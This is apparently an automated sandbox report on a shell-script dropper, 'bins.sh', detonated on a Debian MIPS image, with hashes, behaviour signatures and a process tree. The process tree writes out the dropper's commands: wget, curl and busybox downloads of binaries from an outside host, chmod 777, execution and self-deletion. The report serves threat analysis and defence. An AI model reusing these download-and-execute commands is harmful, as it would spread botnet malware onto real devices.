Analysis
-
max time kernel
72s -
max time network
104s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28-10-2024 09:13
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
b385712a9f0ed1dbec9bfc8275bb2da9
-
SHA1
dedbedbd8e99674ee12610605d357a8375915d7d
-
SHA256
7a1469a1ef092c727698affaffb0f788d398db1e393a4453f28aa140a8c943e7
-
SHA512
1edd1419ac72eaf9befc0c174972fc05992bee64cc63851c526a43fa229181e080f0255f6fc9594a41b0fe23521fa4ed19eff11b2bb485679870f1155929227e
-
SSDEEP
192:iZ//MNtZQV/VxcbrorvqKGXT0MbGadXLPoBp5//MNtZ0VxcbrSrveX90MbGadLPF:iZ//MNtZQV/VxcbrorvqKgT0MbGadXLX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodpid process 728 chmod 737 chmod -
Executes dropped EXE 2 IoCs
Processes:
b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZioc pid process /tmp/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3 729 b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3 /tmp/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ 738 ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ -
Processes:
curlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 8 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlbusyboxwgetcurlwgetcurlbusyboxpid process 733 wget 734 curl 736 busybox 741 wget 742 curl 705 wget 713 curl 726 busybox -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlwgetcurlbusyboxwgetcurlbusyboxdescription ioc process File opened for modification /tmp/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX wget File opened for modification /tmp/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX curl File opened for modification /tmp/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3 wget File opened for modification /tmp/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3 curl File opened for modification /tmp/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3 busybox File opened for modification /tmp/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ wget File opened for modification /tmp/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ curl File opened for modification /tmp/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:696
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF32⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:705
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:713
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF32⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:726
-
-
/bin/chmodchmod 777 b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF32⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3./b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF32⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF32⤵PID:732
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:733
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:736
-
-
/bin/chmodchmod 777 ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ./ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ2⤵PID:740
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:742
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
101KB
MD58d0f8d45165dc1f3ba334ce75be39621
SHA11d5baece9d5af3885276735c3c20d28e161e00ff
SHA25617441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7
-
Filesize
100KB
MD53b78bb645b81d600c30713d416f666be
SHA123796112f2cce2afb2217498b5ecf2801ab550f2
SHA256d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA5129532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9
-
Filesize
88KB
MD5e9e5d79acad49bbe6c77df0385ec77aa
SHA153bbc8b58873cf3117743fab15bd5508421370eb
SHA256a585eff62bec554d3d7f23aaf9b298a15eb328e8968352339db915ef427f27bd
SHA512828680ef393890f3c8805527a473f018b212fa1d6c8534fc03bb34f910de4b8d1cd5ce3cef2c06396f225a61794205a61d9fdc6847b14ebd6d7267af9f38f381
-
Filesize
12KB
MD58bd9ed049a0d02b29a05249c4f5a48ef
SHA189ba06fada2c17657baac44c972ed118bedd4590
SHA256f1998857b0ee9a2b0e863da21667097f6e2021f5574d0146a7b376b4d7a10b1c
SHA512d9524b443d1e068c380bf5c14aac78a2dfd6b46763cd001275d048c2c276d51aff4ee9b98de91745b2efc7b4306adf8e82cede6409aff21bcb6881cc493a079c